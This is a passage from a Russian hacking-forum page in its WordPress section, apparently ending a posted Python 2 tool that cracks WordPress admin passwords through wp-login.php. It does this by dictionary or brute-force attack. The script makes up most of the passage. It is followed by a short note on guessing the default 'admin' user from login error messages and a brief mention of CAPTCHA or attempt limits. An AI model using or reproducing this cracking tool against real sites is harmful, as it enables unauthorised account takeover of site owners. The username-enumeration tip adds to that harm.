    f = urllib2.urlopen(request).read()
    if not "Incorrect password." in f: print "[!] Password is : "+mot ; break
    node( table, string, size-1 )

    def bruteforce( table, size ):
    for c in table:
    node( table, c, size-1 )

    if (len(sys.argv) < 3):
    print "Usage : float.py "
    print "\nDefault: User is 'admin'"
    print "Choice : 1} Dictionnary Attack, use dictionnary file"
    print " 2} Bruteforce Attack, use number of character for password"

    else:
    server = sys.argv[1]
    if sys.argv[3] == "1":
    a , b = open(sys.argv[4],'r') , 0
    for lines in a: b = b + 1
    a.seek(0)
    c = 0
    while (c < b):
    mot = a.readline().rstrip()
    data = {'log': sys.argv[2],
    'pwd': mot}
    print "[+] Testing : "+mot
    request = urllib2.Request(server, urllib.urlencode(data))
    f = urllib2.urlopen(request).read()
    if not "Incorrect password." in f: print "[!] Password is : "+mot ; break
    else: c = c + 1 ; pass
    if sys.argv[3] == "2":
    print "[-] Server is : "+server
    print "[-] User is : "+sys.argv[2]
    print "[-] Number of characters are : "+sys.argv[4]
    number = int(sys.argv[4])
    bruteforce( tab, number )
    ############## Source code #####################

    The problem is : many time, the default user who is created is : admin, then you can try to crack the password, to stop that, you can use image confirmation or a limit for the connection (for example, only 5 tests).

    To know if "admin" is the default user, you can try to go to the login page : http://site.com/wp-login.php and you try ; login : admin, pass : test (or anything else).

    if "Wrong password" is printed on the page, the default user is admin, but if there is : "Wrong Username" then it's not the default password wink

    Kad'

     
    Форум » ПрогрАммиРОванИе » Веб-прогрАмминг » WordPress
    Страница 1 из 11
    Поиск:

    Профиль
    ИнформацияУправление
    Сегодня: 19, 19.11.2017, 19:03
    Вы используете: " v "
    ВаШ внешний IP: "54.162.166.214"
    У вас новых личных сообщений · Мой профиль | Выход




        Главная      
    ...
    На службе : дней

    19:03
    Обновить


    Пользователи
    aka_kludge
    qwerty
    LeadyTOR
    aka_Atlantis
    AdHErENt
    mAss
    Sissutr
    hiss
    DrBio
    tHick

    Поиск

    ...



    Друзья сайта

    ГеоИнфоКом


    Miranda Инфо

    Метеориты

    Остаться в живых - LOST. Лучший сайт сериала.

    Метеориты

    Hackersoft

    hackings.ru

    Схемы дл<a href=


    Обмен cсылками
    ITbuben - IT-шные блоги, сообщества, Windows, Linux, Web, Программирование, Интернет, Юмор, Софт


    Copyright tHR - TeAM 2017 г. admin: aka_kludge (ICQ:334449009) Moderator's: LeadyTOR, HanaBi ... Яндекс.Метрика